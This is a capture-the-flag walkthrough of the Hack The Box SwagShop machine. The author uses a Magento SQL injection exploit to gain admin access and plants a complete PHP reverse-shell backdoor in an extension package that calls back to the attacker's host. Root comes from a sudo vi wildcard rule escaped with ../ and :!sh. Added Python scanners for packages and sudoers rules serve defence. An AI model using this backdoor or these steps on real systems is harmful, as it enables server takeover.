Hi there, this is the SwagShop machine walkthrough. An easy box, but with a poor connection 😒 that always got reset by other users. Once we get root on this box, we can try the beta version of the Hack The Box store 😎.
Information
- OS: Linux
- IP: 10.10.10.140
- Difficulty: Easy
Enumeration
First, let's start with an nmap scan for the open ports.
# nmap -sV -sC -A -Pn 10.10.10.140
Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-04 15:55 KST
Nmap scan report for 10.10.10.140
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|_ 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.17 seconds
SSH is running, but I don't have any login information, so let's see what port 80 serves. It is a web page titled Magento. I googled Magento, and it is an eCommerce platform written in PHP.
Magento SQL Injection Vulnerability
I started searching for Magento vulnerabilities on Google, and the first thing that came up was an SQL injection affecting some versions of Magento. Hmmm... I hadn't checked the Magento version, but I still searched Google for "magento sql injection exploit db".
Yeah, the first Google result was interesting. I downloaded the exploit code from Exploit-DB and modified it by changing the target as below.
target = "http://10.10.10.140/index.php"
And run the code.
# python 37977.py
WORKED
Check http://10.10.10.140/index.php/admin with creds forme:forme
The SQL injection script does work. So now I log in with the username forme and the password forme, and it takes me into the admin panel.
Shell Uploading
Normally, after logging in to a dashboard, I look for a place to upload a file or a shell. But the Magento dashboard is new to me, so I did some more googling for help xD.
After searching for "magento upload shell" and watching some videos on YouTube, I found a place to upload files at http://10.10.10.140/downloader, logging in with the previous username and password. I tried to upload a PHP shell directly, but it isn't allowed since the uploader accepts only package files.
So I searched for "magento shell" and found this one: LINK. Since they provided the source code, we can put the reverse shell code inside the PHP file (it may be easier lol).
I modified the IndexController.php file inside Backdoor Code/app/code/community/Lavalamp/Connector/controllers/ by adding a reverse shell script as follows.
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = 'my_ip_address';
$port = 1234;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();
    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }
    if ($pid) {
        exit(0); // Parent exits
    }
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }
    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

chdir("/");
umask(0);

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

$descriptorspec = array(
    0 => array("pipe", "r"), // stdin is a pipe that the child will read from
    1 => array("pipe", "w"), // stdout is a pipe that the child will write to
    2 => array("pipe", "w")  // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

class Lavalamp_Connector_IndexController extends Mage_Core_Controller_Front_Action
{
    public function indexAction()
    {
        echo "<h1>Ehhh xD</h1>";
    }
}
?>
After modifying it, I simply followed the README.md instructions to repackage the files.
cd Backdoor\ Code
tar -czvf xd.tgz app package.xml skin
mv xd.tgz ..
Now I can upload the reverse shell package to the server.
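From the defender's side, the package installer is the weak point here: Magento Connect installs whatever PHP is inside the .tgz, and any code sitting above the class in a controller file runs the moment that controller is dispatched, exactly as the backdoor above does. The following is an added example, not the writeup's or Magento's own code: a small pre-install scanner that unpacks a package in memory, lists the PHP statements at file scope, and flags process or network calls. The two controller sources it inspects are constructed samples, and the address in the backdoored one is a placeholder.

```python
"""Pre-install scanner for a Magento Connect (.tgz) extension package.
Flags PHP files that hold statements at file scope (those run as soon as the
file is included, e.g. when the controller is dispatched) or that call
process/network functions.  Added example, not the writeup's or Magento's
own code; the controller sources below are constructed samples."""
import io
import re
import tarfile

# Keywords that legitimately open a statement at file scope in a controller.
FILE_SCOPE_OK = {"namespace", "use", "require", "require_once", "include",
                 "include_once", "declare", "class", "abstract", "final",
                 "interface", "trait", "function"}
# Calls a storefront controller has no business making (illustrative subset).
SUSPICIOUS_CALLS = re.compile(
    r"\b(proc_open|fsockopen|pcntl_fork|shell_exec|passthru|popen|system|exec|eval)\s*\(")


def file_scope_statements(src):
    """Return the statements at brace depth 0 of a PHP source.  A small scanner
    skips comments and quoted strings so braces or semicolons inside them do
    not disturb the depth count."""
    src = src.strip()
    src = src[5:] if src.startswith("<?php") else src
    src = src[:-2] if src.endswith("?>") else src
    stmts, buf, depth, i, n = [], "", 0, 0, len(src)
    while i < n:
        c, two = src[i], src[i:i + 2]
        if two == "//" or c == "#":                      # line comment
            j = src.find("\n", i)
            i = n if j == -1 else j
        elif two == "/*":                                 # block comment
            j = src.find("*/", i + 2)
            i = n if j == -1 else j + 2
        elif c in "'\"":                                  # quoted string
            j = i + 1
            while j < n and src[j] != c:
                j += 2 if src[j] == "\\" else 1
            if depth == 0:
                buf += src[i:j + 1]
            i = j + 1
        else:
            if c == "{":
                buf += c if depth == 0 else ""
                depth += 1
            elif c == "}":
                depth -= 1
                if depth == 0 and buf.strip():            # class/function body closed
                    stmts.append(buf.strip() + "}")
                    buf = ""
            elif depth == 0 and c == ";":
                if buf.strip():
                    stmts.append(buf.strip() + ";")
                buf = ""
            elif depth == 0:
                buf += c
            i += 1
    return stmts + ([buf.strip()] if buf.strip() else [])


def is_file_scope_code(stmt):
    """True for a statement that executes on include instead of defining something."""
    head = re.match(r"[A-Za-z_]+", stmt)
    return head is None or head.group(0) not in FILE_SCOPE_OK


def scan_package(tgz_bytes):
    """Map each suspicious .php member of the package to its list of findings."""
    report = {}
    with tarfile.open(fileobj=io.BytesIO(tgz_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not (member.isfile() and member.name.endswith(".php")):
                continue
            src = tar.extractfile(member).read().decode("utf-8", "replace")
            findings = ["file-scope code: " + s.splitlines()[0][:70]
                        for s in file_scope_statements(src) if is_file_scope_code(s)]
            findings += ["calls %s()" % fn for fn in sorted(set(SUSPICIOUS_CALLS.findall(src)))]
            if findings:
                report[member.name] = findings
    return report


# Constructed samples: a backdoored controller (code above the class; the
# address is a placeholder) and a clean one that only defines its class.
SAMPLE_FILES = {
    "app/code/community/Lavalamp/Connector/controllers/IndexController.php": """<?php
set_time_limit(0);
$sock = fsockopen('198.51.100.7', 1234, $errno, $errstr, 30);  // placeholder address
$process = proc_open('/bin/sh -i', array(0 => array('pipe', 'r')), $pipes);
class Lavalamp_Connector_IndexController extends Mage_Core_Controller_Front_Action
{
    public function indexAction() { echo "<h1>Ehhh xD</h1>"; }
}
?>""",
    "app/code/community/Example/Connector/controllers/IndexController.php": """<?php
/** Defines a class and nothing else; braces and ';' here are all inside it. */
class Example_Connector_IndexController extends Mage_Core_Controller_Front_Action
{
    public function indexAction() { $this->loadLayout()->renderLayout(); }
}
""",
}


def build_sample_package(files):
    """Build an in-memory .tgz from {path: source}."""
    out = io.BytesIO()
    with tarfile.open(fileobj=out, mode="w:gz") as tar:
        for name, text in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(text.encode())
            tar.addfile(info, io.BytesIO(text.encode()))
    return out.getvalue()


if __name__ == "__main__":
    for path, findings in scan_package(build_sample_package(SAMPLE_FILES)).items():
        print(path)
        for f in findings:
            print("  -", f)
```

Run against the sample package, only the Lavalamp controller is reported: three file-scope statements plus the fsockopen() and proc_open() calls. The clean controller produces nothing because every brace and semicolon in it is inside the class body. A scanner like this is a gate, not a guarantee (obfuscated code evades a regex), which is why the real fix is to keep /downloader unreachable from the internet and treat every Magento admin account as equivalent to code execution on the web server.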
Get access to the machine
On my machine, I run netcat -lvnp 1234 as the reverse shell listener. Then I just open the uploaded reverse shell via the link http://10.10.10.140/index.php/lavalamp/index.
Now I'm in the machine as the www-data user.
$ netcat -lvnp 1234 Chhaileng@Chhailengs-MacBook-Pro
Connection from 10.10.10.140:54626
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
04:13:14 up 0 min, 0 users, load average: 0.29, 0.08, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@swagshop:/$ ls /home
haris
www-data@swagshop:/$ cd /home/haris
www-data@swagshop:/home/haris$ ls -l
-rw-r--r-- 1 haris haris 33 May 8 09:01 user.txt
www-data@swagshop:/home/haris$ cat user.txt
a4****************************c8
Root
I started by searching for a kernel exploit, but it seems like none of them work.
www-data@swagshop:/home/haris$ uname -a
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
I tried a lot of methods, but none worked. Finally, after searching for help on Google, I ran sudo -l and saw some interesting information.
www-data@swagshop:/home/haris$ sudo -l
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
www-data@swagshop:/home/haris$
As I see it, user www-data can run the command vi as root on anything in /var/www/html. So I ran sudo vi, but it prompted for a password. Then I tried the full path of vi, but it still asked for a password. This time I tried using the full path of the allowed directory, /var/www/html.
www-data@swagshop:/home/haris$ sudo /usr/bin/vi /var/www/html/test.txt
It works. I have created a file named test.txt as the root user.
www-data@swagshop:/var/www/html$ ls -l | grep test
-rw-r--r-- 1 root root 5 Jun 4 04:31 test.txt
Since the permission is granted for /var/www/html/*, which means everything inside that directory, I tried using ../ to escape to the / directory and view /root/root.txt.
www-data@swagshop:/var/www/html$ sudo /usr/bin/vi /var/www/html/../../../root/root.txt
Now I've got the root flag xD
c2****************************21
___ ___
/| |/|\| |\
/_| ´ |.` |_\ We are open! (Almost)
| |. |
| |. | Join the beta HTB Swag Store!
|___|.__| https://hackthebox.store/password
PS: Use root flag as password!
~
~
"/var/www/html/../../../root/root.txt" 10L, 270C 1,1 All
If you want a tty root shell, just type :!sh (like you use :q to exit vi).
~
~
:!sh
# id
uid=0(root) gid=0(root) groups=0(root)
# python3 -c "import pty;pty.spawn('/bin/bash')"
root@swagshop:/var/www/html#
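Reading that sudoers rule the way a defender would, it has three weaknesses at once: NOPASSWD (so a compromised web server gets it for free), a wildcard argument, and a program that can run a shell from inside. The audit below is an added example, not part of the writeup or any tool the author used. It parses sudo -l command lines like the one above and flags each problem, and it shows why the ../ trick works by approximating sudo's argument matching with fnmatch(3) without FNM_PATHNAME, so that * also spans / and .. components (an assumption about sudo's default matching that agrees with what the writeup observed). The list of shell-escaping programs is illustrative, not exhaustive.

```python
"""Audit sudo -l command lines for the problems behind the SwagShop escalation:
NOPASSWD, a wildcard path that '..' can walk out of, and an editor that can
shell out.  Added example for this writeup, not a tool the author used."""
import fnmatch
import posixpath
import re

# Programs that can start a shell or write arbitrary files once they run as
# the target user.  Illustrative subset for this example, not exhaustive.
SHELL_ESCAPE_BINARIES = {"vi", "vim", "view", "nano", "less", "more", "man"}

# "(root) NOPASSWD: /usr/bin/vi /var/www/html/*"  ->  runas, tags, cmd, args
RULE_RE = re.compile(
    r"^\((?P<runas>[^)]*)\)\s*"            # (root) or (ALL : ALL)
    r"(?P<tags>(?:[A-Z]+:\s*)*)"           # NOPASSWD:, SETENV:, ... (optional)
    r"(?P<cmd>\S+)"                        # command path or ALL
    r"(?:\s+(?P<args>.*\S))?\s*$"          # optional argument pattern
)


def parse_rule(line):
    """Split one 'sudo -l' command line into its parts."""
    m = RULE_RE.match(line.strip())
    if not m:
        raise ValueError("not a sudo -l command line: %r" % line)
    tags = [t.rstrip(":") for t in m.group("tags").split()]
    return {"runas": m.group("runas").strip(), "tags": tags,
            "cmd": m.group("cmd"), "args": m.group("args") or ""}


def argument_matches(pattern, candidate):
    """sudo compares the supplied arguments with the sudoers pattern via
    fnmatch(3).  Without FNM_PATHNAME, '*' also matches '/' and a '..'
    component, which is the behaviour the writeup relied on (assumption about
    sudo's default matching; Python's fnmatchcase behaves the same way)."""
    return fnmatch.fnmatchcase(candidate, pattern)


def escapes_directory(pattern, candidate):
    """True when candidate matches the glob yet normalises to a path outside
    the directory the glob was meant to confine it to.  Lexical check only:
    symlinks inside the directory are a separate problem."""
    if not argument_matches(pattern, candidate):
        return False
    fixed = pattern.split("*", 1)[0]                       # "/var/www/html/"
    base = fixed.rstrip("/") if fixed.endswith("/") else posixpath.dirname(fixed)
    resolved = posixpath.normpath(candidate)               # "/root/root.txt"
    return not (resolved == base or resolved.startswith(base + "/"))


def audit_rule(line):
    """Return a list of findings for one rule; an empty list means nothing flagged."""
    rule = parse_rule(line)
    prog = posixpath.basename(rule["cmd"])
    findings = []
    if rule["cmd"] == "ALL":
        findings.append("ALL: unrestricted command set")
    if "NOPASSWD" in rule["tags"]:
        findings.append("NOPASSWD: any process running as this user (here the web "
                        "server) gets the rule without authenticating")
    if prog in SHELL_ESCAPE_BINARIES:
        findings.append("%s can spawn a shell or write any file as %s once started"
                        % (prog, rule["runas"]))
    if any(ch in rule["args"] for ch in "*?["):
        findings.append("wildcard argument %r: fnmatch lets '*' span '/' and '..', "
                        "so the path restriction can be walked out of" % rule["args"])
    return findings


if __name__ == "__main__":
    for f in audit_rule("(root) NOPASSWD: /usr/bin/vi /var/www/html/*"):
        print("-", f)
    print(escapes_directory("/var/www/html/*", "/var/www/html/test.txt"))               # False
    print(escapes_directory("/var/www/html/*", "/var/www/html/../../../root/root.txt"))  # True
```

The safer shape of this rule drops the wildcard and the full editor: list the exact files that need editing and grant sudoedit on them rather than /usr/bin/vi, so the privileged step is a file copy and the editor runs unprivileged. On the detection side, the same escalation leaves a sudo log entry whose COMMAND field contains `..` inside an otherwise fixed path, which is a cheap thing to alert on.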
Rooted. Now let's go to the SwagShop and explore some stuff xD
I ordered a t-shirt from the SwagShop. Using the root flag as the password, I got free shipping from the HTB Store, and here it is, arrived...